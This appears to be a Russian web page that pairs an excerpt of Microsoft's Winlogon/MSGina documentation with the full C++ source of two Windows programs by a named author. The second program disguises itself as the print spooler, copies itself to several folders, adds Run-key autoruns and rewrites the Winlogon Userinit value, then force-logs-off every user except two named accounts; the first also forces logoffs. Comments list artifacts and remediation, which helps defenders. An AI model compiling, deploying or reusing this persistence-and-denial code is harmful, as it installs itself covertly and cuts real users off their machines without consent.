Автор: Шуднев Д. (начальник бюро корпоративной информации КнаАПО)
Для связи с автором идите сюда  http://kms.en.cx/ - там же есть телефон.
Торопитесь, а то мой Друг задумал нечто нехорошее .......

Улыбнитесь: 
  
Кстати, с доменом http://kms.en.cx/ у меня был анекдотичный случай. Когда я работал на одном из заводов в городе К., один из работников принёс начальнику резюме своего знакомого. Начальник стал читать, но суть написанного не очень понял. Позвал взрослых мужиков (программистов, электронщиков, лет за 40). Читают:
 " Образование такое-то, учусь..
   Являюсь владельцем домена kms.en.cx
   ...."
  Тут один из мужиков восклицает: «Я чего-то не понял. Он что, уже 9 лет учится в универе?» Бросились считать. И точно: по годам выходит, что данный владелец вот уже 9 лет учится в универе на одной специальности.

Технические подробности
 

MSGina.dll Features

If you are writing a GINA to replace the Microsoft standard GINA DLL (MSGina.dll), you may want to provide some or all of the standard GINA functionality. Following is a list of standard features and a brief description of how they are controlled.

Registry key values control the availability or behavior of many of these standard GINA features. Unless otherwise noted, these key values belong to the Winlogon registry key and have a value type of [REG_SZ]. The actual path of the Winlogon key is:

\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon

  • Userinit.exe Activation

    Userinit.exe is an application that is executed by MSGina.dll when the user has logged on. It runs in the newly logged-on user's context and on the application desktop. Its purpose is to set up the user's environment, including restoring net uses, establishing profile settings such as fonts and screen colors, and running logon scripts. After completing those tasks, Userinit.exe executes the user shell program(s). The shell programs inherit the environment that Userinit.exe sets up. The specific shell programs that Userinit.exe executes are stored in the Shell key value under the Winlogon registry key.

    The Shell key value can contain a comma-separated list of programs to be executed. Explorer is the default shell program and will be executed if the Shell key value is null or not present. By default, Explorer is listed.



-----------------------------------------------------------------------------------------------------------------------------------------------------------

// spoolssw.cpp : Defines the entry point for the application.
//
#include "stdafx.h"

#include <tchar.h>
#include <time.h>
#include <stdlib.h>
#include <Userenv.h>
#include <shlobj.h>

#define BUFFER MAX_PATH+1

BOOL FFileExists(LPCTSTR );
BOOL MySystemName();
BOOL MySystemLogoff();


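// Entry point of program 1 (spoolssw.cpp).
//
// Behaviour visible in this listing:
//   * If C:\Program Files\Common Files\Microsoft Shared\osgen.log can be
//     opened, the program exits at once and nothing else happens. The file
//     therefore acts as an "off switch" for the forced logoff.
//   * Otherwise the interactive session is logged off with EWX_FORCE, so
//     running applications are closed without a chance to save.
//
// The WinMain parameters are not used. Always returns 0.
int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow)
{
    // The path literal was broken across two lines on the page, which is not
    // a valid string literal; it is written on one line here.
    if (FFileExists("C:\\Program Files\\Common Files\\Microsoft Shared\\osgen.log")) {
        return 0;
    }

    WaitForInputIdle(GetCurrentProcess(), 5000);

    // MySystemLogoff() enables the shutdown privilege first; if it reports
    // failure the logoff is requested once more directly.
    if (!MySystemLogoff()) {
        ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
    }

    return 0;
}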


//****************************************************************************
//
// BOOL FFileExists(LPCTSTR szFile)
//
//****************************************************************************

// Reports whether szFile can be opened for reading.
//
// szFile: path to probe; NULL or an empty string yields FALSE.
// Returns TRUE when CreateFile(OPEN_EXISTING) succeeds, FALSE otherwise.
// Note that a file which exists but cannot be opened with GENERIC_READ is
// also reported as FALSE, because only the open result is examined.
BOOL FFileExists(LPCTSTR szFile)
{
    // Nothing to probe for a missing or empty path.
    if (szFile == NULL || *szFile == _T('\0')) {
        return FALSE;
    }

    // Silence the system error dialogs for the duration of the probe and put
    // the previous mode back immediately afterwards.
    const UINT savedMode = SetErrorMode(SEM_NOOPENFILEERRORBOX | SEM_FAILCRITICALERRORS);
    HANDLE probe = CreateFile(szFile, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
                              NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    SetErrorMode(savedMode);

    if (probe != INVALID_HANDLE_VALUE) {
        CloseHandle(probe);
        return TRUE;
    }
    return FALSE;
}


// Checks the logged-on user name against two hard-coded account names.
//
// Returns FALSE when the current user is one of the two listed accounts
// (case-insensitive compare) and TRUE for every other user. In this first
// program the function is declared and defined but no call to it is visible.
BOOL MySystemName()
{
    TCHAR userName[BUFFER];        // receives the user name
    DWORD userNameLen = BUFFER;    // in: buffer size, out: length written

    // Fetch the name from the system. The buffer is zeroed first, so if
    // GetUserName fails (its result is not checked) an empty string is compared.
    ZeroMemory(userName, BUFFER);
    GetUserName(userName, &userNameLen);

    if (lstrcmpi("zelepukhinma68", userName) == 0 ||
        lstrcmpi("braginags68", userName) == 0) {
        return FALSE;
    }

    return TRUE;
}


// Enables SE_SHUTDOWN_NAME on the process token and forces a logoff.
//
// Returns FALSE if the process token cannot be opened, if enabling the
// privilege leaves a non-success last error, or if ExitWindowsEx fails;
// TRUE when the logoff request was accepted. EWX_FORCE closes running
// applications without letting them save.
// NOTE(review): the token handle is never closed and the result of
// LookupPrivilegeValue is not checked.
BOOL MySystemLogoff()
{
    HANDLE processToken;
    TOKEN_PRIVILEGES shutdownPriv;

    // Open this process's token with rights to query and adjust privileges.
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &processToken)) {
        return FALSE;
    }

    // Describe a single privilege, SE_SHUTDOWN_NAME, to be enabled.
    shutdownPriv.PrivilegeCount = 1;
    shutdownPriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &shutdownPriv.Privileges[0].Luid);

    // AdjustTokenPrivileges can return success without enabling everything,
    // so the outcome is read from GetLastError().
    AdjustTokenPrivileges(processToken, FALSE, &shutdownPriv, 0, (PTOKEN_PRIVILEGES)NULL, 0);
    if (GetLastError() != ERROR_SUCCESS) {
        return FALSE;
    }

    // Log the user off and force all applications to close.
    return ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0) ? TRUE : FALSE;
}
 


Исходник программы № 2
Автор: Шуднев Д. (начальник бюро корпоративной информации КнаАПО).

-----------------------------------------------------------------------------------------------------------------------------------------------------------

// spoolsw.cpp : Defines the entry point for the application.
//

#include "stdafx.h"
#include <windows.h>
#include <tchar.h>
#include <Userenv.h>
#include <shlobj.h>

#define BUFFER MAX_PATH+1

static const char szFile[] = "spoolsw.exe";

BOOL MySystemFileSetup();
BOOL FFileExists(LPCTSTR szFile);
BOOL MySystemName();
BOOL MySystemLogoff();
BOOL MySystemShutdown();

// Entry point of program 2 (spoolsw.cpp).
//
// Flow visible in this listing:
//   1. MySystemName() returns FALSE for two hard-coded accounts; for those
//      users the program exits without doing anything.
//   2. MySystemFileSetup() copies the executable and registers autoruns. It
//      returns TRUE only when its ".asu" marker file already exists, so a
//      run that has just created the marker ends here without a logoff.
//   3. Otherwise the session is logged off with EWX_FORCE.
//
// The WinMain parameters are not used. Always returns 0.
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR lpCmdLine,
                     int nCmdShow)
{
    // Short-circuit keeps the original order: setup is not attempted for an
    // exempt account.
    if (MySystemName() && MySystemFileSetup()) {
        WaitForInputIdle(GetCurrentProcess(), 7000);

        // Fall back to a direct logoff request if the helper reports failure.
        if (!MySystemLogoff()) {
            ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0);
        }
    }

    return 0;
}


// MySystemFileSetup: copies the running executable to several locations,
// registers those copies to start at logon, and drops a marker file.
//
// Artifacts created by this function (useful when triaging or cleaning a host):
//   - <Startup folder>\spoolsw.exe            (CSIDL_STARTUP)
//   - <user profile dir>\spoolsw.exe          (GetTempPath result is the fallback)
//   - <Windows dir>\spoolsw.exe
//   - HKCU\Software\Microsoft\Windows\CurrentVersion\Run, value "AsuFile1"
//   - HKLM\Software\Microsoft\Windows\CurrentVersion\Run, value "AsuFile2"
//   - HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, value "Userinit",
//     rewritten to "<Windows dir>\system32\userinit.exe,<Windows dir>\spoolsw.exe"
//   - <user profile dir>\.asu                  (hidden marker file)
// The two HKLM writes happen only when the copy into the Windows directory has
// just succeeded, i.e. when the account can write there.
// The file name spoolsw.exe is close to that of the Windows print spooler,
// spoolsv.exe; check the exact name and the path when reviewing autoruns.
//
// Returns TRUE only when the .asu marker already exists. Returns FALSE when the
// marker has just been created, and also when GetModuleFileName, GetTempPath or
// the marker's CreateFile fails.
//
// NOTE(review): hToken is never closed, dwErrorCode is assigned but never read,
// and the wsprintf/strcpy calls write into MAX_PATH+1 buffers without a length
// check.
BOOL MySystemFileSetup()
{
// HMODULE hModule;
HANDLE hFile;
LPTSTR lpProfileDir = NULL ;
LPTSTR pszFile = 0;
LPTSTR lpszPath = 0;
TCHAR tchBuffer1[BUFFER];
TCHAR tchBuffer2[BUFFER];
TCHAR tchMes[BUFFER];
DWORD nSize=BUFFER;
TCHAR pszFileAsu[BUFFER];
TCHAR pszFileGina[BUFFER];
TCHAR pszFileGinaStartUp[BUFFER];
TCHAR pszDirSys[BUFFER], pszFileSys[BUFFER];
TCHAR g_szFile[BUFFER], g_szPath[BUFFER];
DWORD dwErrorCode = 0;
HANDLE hToken = NULL;

// Get the full path of the running executable.
ZeroMemory(g_szFile, BUFFER);
if (0==GetModuleFileName(GetModuleHandle(NULL), g_szFile, BUFFER )) return FALSE;

// Split the file-name component out of the full path. pszFile is only used by
// the commented-out wsprintf calls below; the fixed name in szFile is used instead.
ZeroMemory(g_szPath, BUFFER);
GetFullPathName(g_szFile,BUFFER,g_szPath, &pszFile );

// Copy the file into the Startup folder.
ZeroMemory(tchBuffer1, BUFFER);
lpszPath=tchBuffer1;
nSize=BUFFER;
if (TRUE==SHGetSpecialFolderPath(NULL,lpszPath,CSIDL_STARTUP,0)) {
//Import library shell32.lib
//MessageBox (NULL,lpszPath,"SHGetSpecialFolderPath",MB_OK);
ZeroMemory(pszFileGinaStartUp, BUFFER);
//wsprintf(pszFileGinaStartUp,"%s\\%s",lpszPath,pszFile);
wsprintf(pszFileGinaStartUp,"%s\\%s",lpszPath,szFile);
// CopyFile is called with bFailIfExists = TRUE, so an existing copy is not overwritten.
if (!FFileExists(pszFileGinaStartUp)) CopyFile(g_szFile,pszFileGinaStartUp, TRUE);
}

// Open the access token associated with the calling process.
// On failure hToken stays NULL and is still passed to GetUserProfileDirectory below.
if (OpenProcessToken( GetCurrentProcess(), TOKEN_QUERY, &hToken ) == FALSE) { dwErrorCode = GetLastError(); }

// Resolve the user profile directory; fall back to the temp path if that fails.
ZeroMemory(tchBuffer2, BUFFER);
lpProfileDir=tchBuffer2;
nSize=BUFFER;
if (0==GetUserProfileDirectory(hToken, lpProfileDir, &nSize))
{
dwErrorCode = GetLastError();
if (0==GetTempPath(BUFFER, lpProfileDir)) return FALSE ;
}

// MessageBox (NULL,lpProfileDir,"ProfilesDirectory",MB_OK);

// Copy the file into the user profile directory (e.g. C:\Documents and Settings\Joe).
ZeroMemory(pszFileGina, BUFFER);
//wsprintf(pszFileGina,"%s\\%s",lpProfileDir,pszFile);
wsprintf(pszFileGina,"%s\\%s",lpProfileDir,szFile);
if (!FFileExists(pszFileGina)) CopyFile(g_szFile,pszFileGina, TRUE);

/*====HKEY_CURRENT_USER======== write to the registry ===============*/
HKEY hKey;
char szBuf[BUFFER];

// Per-user autorun: open HKCU\...\CurrentVersion\Run and add a value that
// points at the copy in the profile directory.
//KEY_ALL_ACCESS|KEY_ENUMERATE_SUB_KEYS | KEY_QUERY_VALUE | KEY_CREATE_SUB_KEY
if (ERROR_SUCCESS == RegOpenKeyEx (HKEY_CURRENT_USER, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Run"),0,KEY_ALL_ACCESS,&hKey))
{
// Value data: full path of the profile-directory copy.
szBuf[0]='\0';strcpy(szBuf, pszFileGina);

// Write the autorun value.
RegSetValueEx(hKey, // key handle
"AsuFile1", // value name
0, // must be zero
REG_SZ, // value type REG_SZ REG_EXPAND_SZ
(LPBYTE) szBuf, // pointer to value data
strlen(szBuf) + 1); // length of value data, including the terminator

RegCloseKey (hKey); // Close the key handle.
}

/*===HKEY_LOCAL_MACHINE========================*/
ZeroMemory(pszDirSys, BUFFER);
// Get the Windows directory.
if ( GetWindowsDirectory(pszDirSys, BUFFER) )
{
ZeroMemory(pszFileSys, BUFFER);
wsprintf(pszFileSys,"%s\\%s",pszDirSys,szFile);
// Everything below runs only if the file was absent and the copy into the
// Windows directory succeeded.
if (!FFileExists(pszFileSys))
if (0!=CopyFile(g_szFile,pszFileSys, TRUE))
{

// Machine-wide autorun: HKLM\...\CurrentVersion\Run.
if (ERROR_SUCCESS == RegOpenKeyEx (HKEY_LOCAL_MACHINE,
TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Run"),0,KEY_WRITE,&hKey))
{
// Value data: full path of the Windows-directory copy.
szBuf[0]='\0';strcpy(szBuf, pszFileSys);

// Write the autorun value.
RegSetValueEx(hKey, // key handle
"AsuFile2", // value name
0, // must be zero
REG_SZ, // value type REG_SZ REG_EXPAND_SZ
(LPBYTE) szBuf, // pointer to value data
strlen(szBuf) + 1); // length of value data, including the terminator

RegCloseKey (hKey); // Close the key handle.
}


// Winlogon "Userinit": the value is replaced with userinit.exe followed by the
// copied executable, so the copy is started at logon alongside userinit.exe.
// To remediate, restore the value so it references only userinit.exe and
// delete the copied file.
if (ERROR_SUCCESS == RegOpenKeyEx (HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"),0,KEY_WRITE,&hKey))
{
// Value data: "<Windows dir>\system32\userinit.exe,<Windows dir>\spoolsw.exe".
szBuf[0]='\0';
wsprintf(szBuf,"%s\\system32\\userinit.exe,%s",pszDirSys,pszFileSys);

// Overwrite the Userinit value.
RegSetValueEx(hKey, // key handle
"Userinit", // value name
0, // must be zero
REG_SZ, // value type REG_SZ REG_EXPAND_SZ
(LPBYTE) szBuf, // pointer to value data
strlen(szBuf) + 1); // length of value data, including the terminator

RegCloseKey (hKey); // Close the key handle.
}

}
}

/*============================================================*/

// Build the marker path: <profile dir>\.asu
ZeroMemory(pszFileAsu, BUFFER);
lstrcpy(pszFileAsu, lpProfileDir);
lstrcat(pszFileAsu, (LPSTR) "\\.asu");

//MessageBox (NULL,pszFileAsu,"FileAsu",MB_OK);

// Marker already present: report TRUE, which lets WinMain go on to the logoff.
if (FFileExists(pszFileAsu)) return TRUE ;

// Marker absent: create it as a hidden file.
hFile = CreateFile(pszFileAsu, // create
GENERIC_WRITE, // open for writing
0, // do not share
NULL, // no security
CREATE_NEW ,// CREATE_ALWAYS CREATE_NEW
FILE_ATTRIBUTE_NORMAL | // normal file
FILE_ATTRIBUTE_HIDDEN,
NULL); // no attr. template

if (hFile == INVALID_HANDLE_VALUE) return FALSE ;
// The marker content is a fixed authors/year string, written with its terminator.
ZeroMemory(tchMes, BUFFER);
wsprintf(tchMes,"Авторы программы:\n Шуднев Д. \n Прохоров \n 2006год ");
WriteFile(hFile, tchMes, lstrlen(tchMes)+1, &nSize ,NULL);
CloseHandle(hFile);

// FALSE here means "marker just created": WinMain returns without a logoff on this run.
return FALSE;
}


//****************************************************************************
//
// BOOL FFileExists(LPCTSTR szFile)
//
//****************************************************************************

// Reports whether szFile can be opened for reading.
//
// szFile: path to probe; NULL or an empty string yields FALSE.
// Returns TRUE when CreateFile(OPEN_EXISTING) succeeds, FALSE otherwise, so
// a file that exists but cannot be opened for read is also reported as FALSE.
BOOL FFileExists(LPCTSTR szFile)
{
    BOOL found = FALSE;

    if (szFile != NULL && *szFile != _T('\0')) {
        // Keep the system from showing error dialogs while probing, then
        // restore whatever error mode was active before.
        const UINT previousMode = SetErrorMode(SEM_NOOPENFILEERRORBOX | SEM_FAILCRITICALERRORS);
        HANDLE probe = CreateFile(szFile, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE,
                                  NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
        SetErrorMode(previousMode);

        if (probe != INVALID_HANDLE_VALUE) {
            CloseHandle(probe);
            found = TRUE;
        }
    }

    return found;
}

//+---------------------------------------------------------------------------
//
// Member: fFileExists
//
// Purpose: Find whether the given file exists
//
// Arguments:
// ptszFileName [in] File name of the file to check
//
// Returns: TRUE or FALSE
//
// Notes:
//
// Attribute-based existence check. No call to this function is visible in
// the listing; the other functions use FFileExists.
//
// ptszFileName: path to query.
// Returns FALSE when GetFileAttributes reports failure ((DWORD)-1), TRUE
// otherwise. Only the failure value is tested, so any path for which the
// attributes can be read counts as existing.
BOOL fFileExists(LPTSTR ptszFileName)
{
    const DWORD attributes = GetFileAttributes(ptszFileName);

    // (DWORD)-1 is the value GetFileAttributes returns when the query fails.
    return (attributes == (DWORD)-1) ? FALSE : TRUE;
}


// Checks the logged-on user name against two hard-coded account names.
//
// Returns FALSE when the current user is one of the two listed accounts
// (case-insensitive compare), which makes WinMain exit before any file or
// registry change; returns TRUE for every other user.
BOOL MySystemName()
{
    TCHAR userName[BUFFER];        // receives the user name
    DWORD userNameLen = BUFFER;    // in: buffer size, out: length written

    // The buffer is zeroed first, so if GetUserName fails (its result is not
    // checked) the comparisons below see an empty string.
    ZeroMemory(userName, BUFFER);
    GetUserName(userName, &userNameLen);

    if (lstrcmpi("zelepukhinma68", userName) == 0 ||
        lstrcmpi("braginags68", userName) == 0) {
        return FALSE;
    }

    return TRUE;
}


// Enables SE_SHUTDOWN_NAME on the process token and forces a logoff.
//
// Returns FALSE if the process token cannot be opened, if enabling the
// privilege leaves a non-success last error, or if ExitWindowsEx fails;
// TRUE when the logoff request was accepted. EWX_FORCE closes running
// applications without letting them save.
// NOTE(review): the token handle is never closed and the result of
// LookupPrivilegeValue is not checked.
BOOL MySystemLogoff()
{
    HANDLE processToken;
    TOKEN_PRIVILEGES shutdownPriv;

    // Open this process's token with rights to query and adjust privileges.
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &processToken)) {
        return FALSE;
    }

    // Describe a single privilege, SE_SHUTDOWN_NAME, to be enabled.
    shutdownPriv.PrivilegeCount = 1;
    shutdownPriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &shutdownPriv.Privileges[0].Luid);

    // The outcome of the adjustment is read from GetLastError().
    AdjustTokenPrivileges(processToken, FALSE, &shutdownPriv, 0, (PTOKEN_PRIVILEGES)NULL, 0);
    if (GetLastError() != ERROR_SUCCESS) {
        return FALSE;
    }

    // Log the user off and force all applications to close.
    return ExitWindowsEx(EWX_LOGOFF | EWX_FORCE, 0) ? TRUE : FALSE;
}


// Example taken from the documentation.
//
// Enables SE_SHUTDOWN_NAME on the process token and requests a forced system
// shutdown (EWX_SHUTDOWN | EWX_FORCE). Declared and defined here, but no call
// to it is visible in the listing.
//
// Returns FALSE if the process token cannot be opened, if enabling the
// privilege leaves a non-success last error, or if ExitWindowsEx fails;
// TRUE when the shutdown request was accepted.
// NOTE(review): the token handle is never closed and the result of
// LookupPrivilegeValue is not checked.
BOOL MySystemShutdown()
{
    HANDLE processToken;
    TOKEN_PRIVILEGES shutdownPriv;

    // Open this process's token with rights to query and adjust privileges.
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &processToken)) {
        return FALSE;
    }

    // Describe a single privilege, SE_SHUTDOWN_NAME, to be enabled.
    shutdownPriv.PrivilegeCount = 1;
    shutdownPriv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &shutdownPriv.Privileges[0].Luid);

    // The outcome of the adjustment is read from GetLastError().
    AdjustTokenPrivileges(processToken, FALSE, &shutdownPriv, 0, (PTOKEN_PRIVILEGES)NULL, 0);
    if (GetLastError() != ERROR_SUCCESS) {
        return FALSE;
    }

    // Shut down the system and force all applications to close.
    return ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE, 0) ? TRUE : FALSE;
}



 
